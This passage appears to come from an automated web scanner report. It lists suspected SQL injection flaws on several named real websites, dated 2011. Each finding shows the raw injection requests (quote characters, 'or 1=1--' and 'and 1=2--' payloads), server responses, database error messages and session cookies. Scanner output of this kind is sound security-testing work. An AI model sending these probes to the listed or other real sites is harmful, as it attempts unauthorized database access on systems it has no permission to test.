Oops, Fatal Error 3

Request 2

GET /unsubscribe.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.124. http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /word-of-the-day/feeds.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /word-of-the-day/feeds.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /word-of-the-day/feeds.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.125. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20086312%20or%201%3d1--%20 and 20086312%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news/201020086312%20or%201%3d1--%20/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div id="nww_footer">

           

       <style type="text/css">
       <!--
div#nww_footer_signup {
-moz-background-clip:border;
-moz-background-inline-policy:continuous;
-moz-background-origin:padding;
background:#191919 url(http://www.networkworld.com/includes/styles/r08/img/footer-leftback.png) repeat-x scroll 0 0;
border-right:1px solid #5A5A5A;
float:left;
height:159px;
padding:10px 10px 10px 15px;
width:225px;
}
div#nww_footer_signup dl dt span {
margin-top:15px;
margin-bottom:15px;
}
div#nww_footer_signup input {
   margin-top:10px;
   margin-bottom:8px;
}
div#nww_footer_signup button {
background:#247500 url(http://www.networkworld.com/includes/styles/r08/img/footer-buttontd.jpg) no-repeat scroll 0 0;
border:medium none;
color:white;
cursor:pointer;
display:block;
float:left;
font-family:Verdana,sans-serif;
font-size:14px;
height:30px;
padding-bottom:2px;
width:160px;
text-decoration:none;
}

div#nww_footer_signup a {
background:#247500 url(http://www.networkworld.com/includes/styles/r08/img/footer-buttontd.jpg) no-repeat scroll 0 0;
color:white;
float:left;
font-family:Verdana,sans-serif;
font-size:14px;
height:22px;
padding-top:8px;
text-align:center;
text-decoration:none;
width:160px;
}

div#nww_footer_signup button:hover, div#nww_footer_signup a:hover {
background:#5EAD00 url(http://www.networkworld.com/includes/styles/r08/img/footer-buttontd-2.jpg) no-repeat scroll 0 0;

}
-->
</style>
   <div id="nww_footer_signup">
       <dl>
           <dt>
               Network World's Testing Guide to Microsoft's Top Products
               <span>View the results of our recent tests</span>
           </dt>
           <dd>
               <a href="http://www.accelacomm.com/jaw/nwwmtc_ftr_nw/7/51008142/">Download PDF</a>
           </dd>

       </dl>
</div>

   <!-- <div id="nww_footer_signup">
       <dl>
           <dt>
               Build your own newsletters with TechDispenser
               <span> Save time, stay informed, de-clutter your inbox</span>
           </dt>
           <dd>
           <form target="_blank" id="footerNLform" name="footerNLf
...[SNIP]...

Request 2

GET /news/201020086312%20or%201%3d2--%20/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div id="nww_footer">

           

<div id="nww_footer_signup">
       <dl>
           <dt style="margin-bottom:15px;">
               Network World's Daily Newsletter
               <span style="margin-top:15px; display:block;">Stay up to date with the most important tech news </span>
           </dt>
           <dd>
           <form target="new_window" id="footerNLform" name="footerNLform" method="get" action="http://www.networkworld.com/nl/nl_single_reg/daily-news.html?email=&source=nwwnla_nlt_ftr_mod2" onsubmit="openNewWindow()">
               <!--input type="hidden" name="lists" value="networkworld_daily_news_alert"/-->
        <!--<input type="text" name="email" id="netflashinstantsignup" value="Email address"/>-->
        <input type="hidden" value="nwwnla_nlt_ftr_mod" name="source"/>

               <button type="submit">Sign-up</button>
               <!--<a href="/tos.html"><span class="signupterms">Terms of Service</span></a>-->
</form>
           </dd>
           <script type="text/javascript">
           $("form#footerNLform input#netflashinstantsignup").focus(function () {
       $(this).val("");
       });
   </script>
           <!-- <dd>
               <div class="nww_footer_complete">
                   <span>Thank you!</span> You are now subscribed. <a href="#">See more newsletters</a>
               </div>
           </dd> -->
       </dl>
</div>

   <div id="nww_footer_nwwitems">
       <dl>
           <dt>
               Network World, Inc <a href="feed://www.networkworld.com/rss/netflash.xml"><img alt="RSS" src="/includes/styles/r08/img/ico-rss.gif"/></a>
               <span>The Connected Enterprise</span>
           </dt>
           <dd>
               <ul>
                   <li><a href="http://www.networkworld.com/aboutus/index.html" rel="nofollow">About Us</a></li>
                   <li><a href="http://www.networkworld.com/aboutus/careers.html" rel="nofollow">Jobs @ NWW</a></li>
                   <li><a href="http://www.networkworld.com/aboutus/index.html" rel="nofollow">Contact Us</a></li>
               </ul>
               <ul>
                   <li><a href="http://www.networkworld.com/newsletters/subscribe.html?k=nwwnla_ftr_link">Newsletter Subscriptions</a></li>
                   <li><a href="http://www.ne
...[SNIP]...

1.126. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /licenses'/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:09:24 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6sj2lur9a5t479v3d37vivubu3; expires=Thu, 17-Feb-2011 03:42:44 GMT; path=/; domain=.opensource.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</strong> (PostgreSQL variant)
Submission: ...</p>
...[SNIP]...

1.127. http://www.opensource.org/licenses/bsd-license.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/bsd-license.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /licenses/bsd-license.php' HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:09:32 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=atds4ieat3ah6p2t9gs7kmoss4; expires=Thu, 17-Feb-2011 03:42:52 GMT; path=/; domain=.opensource.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</strong> (PostgreSQL variant)
Submission: ...</p>
...[SNIP]...

1.128. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/soundings-publications-llc/2123/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 67864195%20or%201%3d1--%20 and 67864195%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/soundings-publications-llc/212367864195%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3370
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }
   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
       <!-- END: HEADER -->
       
        <!-- START: SET 1 -->
    <div id="set1">
       NY Daily News Flyerboard     </div>
    <!-- END: SET 1 -->

           <!-- START: CONTENT -->
           <div id="content">

               

               <div style="text-align: center; margin: 10px;">
                   
       
                   
            <s
...[SNIP]...

Request 2

GET /flyerboard/soundings-publications-llc/212367864195%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:09 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050



1.129. https://www.paperg.com/post.php [bid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The bid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the bid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /post.php?bid=2123%20and%201%3d1--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 1

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<img id="temp4_norm" src="img/temp4.jpg" onclick="hide('temp4_norm');show('temp4_over');switch_cat(4);" style="float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                       <img id="temp4_over" src="img/temp4_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                   </span>
                                       <span onmouseover="display_template_info(5);" onmouseout="display_template_info(0);">
                       <img id="temp5_norm" src="img/temp5.jpg" onclick="hide('temp5_norm');show('temp5_over');switch_cat(5);" style="float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                       <img id="temp5_over" src="img/temp5_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;visibility:hidden;" />
                   </span>
                   
               <div style="display:none;">
               <select name="loc_cat" id="loc_cat" size="1" class="post"
                   onChange="changeCategory( parseInt( document.getElementById( 'loc_cat' ).value ) );saveInput( this.getAttribute( 'name' ) );">
                               <option value="3" selected>General</option>
           <script type="text/javascript">
           var selected_cat = document.getElementById("temp3_norm");
           if(selected_cat)
           {
               setTimeout("selected_cat.onclick();", 2000);
           }
           </script>
                           <option value="4">Real Estate</option>
                           <option value="5">Promotion</option>
                           </select>
               </div>
               <script>
               var selected_template = 0;
               function switch_cat(value)
               {
                   selected_template = value;
                   //hide other values                    
                   var i;
                   for(i = 3; i <= 5; i++)
                   {
                       if(i == selected_template)
                       {
                           hide('temp' + i + '_norm');
                           show('temp' + i + '_over');
                       }
                       else
                       {
                           hide('temp' + i + '_over');
                           show('temp' + i + '_norm');
                       }
                   }
                   
                   var cat_node = document.getElementById('loc_cat');
                   cat_node.value = value;
                   cat_node.onchange();
               }
               
               function display_template_info(cat_id)
               {
                   var text = '';
                   switch(cat_id)
                   {
                   case 3:
                       text = 'The most versatile template. Allows you to include text like address, phone, and URL.';
                       break
...[SNIP]...

Request 2

GET /post.php?bid=2123%20and%201%3d2--%20&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1a2a1fi9q2vop26mnuph8otr37;

Response 2

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 05:05:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<img id="temp4_norm" src="img/temp4.jpg" onclick="hide('temp4_norm');show('temp4_over');switch_cat(4);" style="float:left;padding:5px;cursor:pointer;" />
                       <img id="temp4_over" src="img/temp4_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;" />
                   </span>
                                       <span onmouseover="display_template_info(5);" onmouseout="display_template_info(0);">
                       <img id="temp5_norm" src="img/temp5.jpg" onclick="hide('temp5_norm');show('temp5_over');switch_cat(5);" style="float:left;padding:5px;cursor:pointer;" />
                       <img id="temp5_over" src="img/temp5_over.jpg" style="display:none;float:left;padding:5px;cursor:pointer;" />
                   </span>
                   
               <div style="display:none;">
               <select name="loc_cat" id="loc_cat" size="1" class="post"
                   onChange="changeCategory( parseInt( document.getElementById( 'loc_cat' ).value ) );saveInput( this.getAttribute( 'name' ) );">
                               <option value="3" selected>General</option>
           <script type="text/javascript">
           var selected_cat = document.getElementById("temp3_norm");
           if(selected_cat)
           {
               setTimeout("selected_cat.onclick();", 2000);
           }
           </script>
                           <option value="4">Real Estate</option>
                           <option value="5">Promotion</option>
                           </select>
               </div>
               <script>
               var selected_template = 0;
               function switch_cat(value)
               {
                   selected_template = value;
                   //hide other values                    
                   var i;
                   for(i = 3; i <= 5; i++)
                   {
                       if(i == selected_template)
                       {
                           hide('temp' + i + '_norm');
                           show('temp' + i + '_over');
                       }
                       else
                       {
                           hide('temp' + i + '_over');
                           show('temp' + i + '_norm');
                       }
                   }
                   
                   var cat_node = document.getElementById('loc_cat');
                   cat_node.value = value;
                   cat_node.onchange();
               }
               
               function display_template_info(cat_id)
               {
                   var text = '';
                   switch(cat_id)
                   {
                   case 3:
                       text = 'The most versatile template. Allows you to include text like address, phone, and URL.';
                       break;
                   case 4:
                       text = 'Use for real estate listings. Allows you
...[SNIP]...

1.130. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=hhaihbhl84hkvcra7pfqf1cd13; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.131. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.132. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

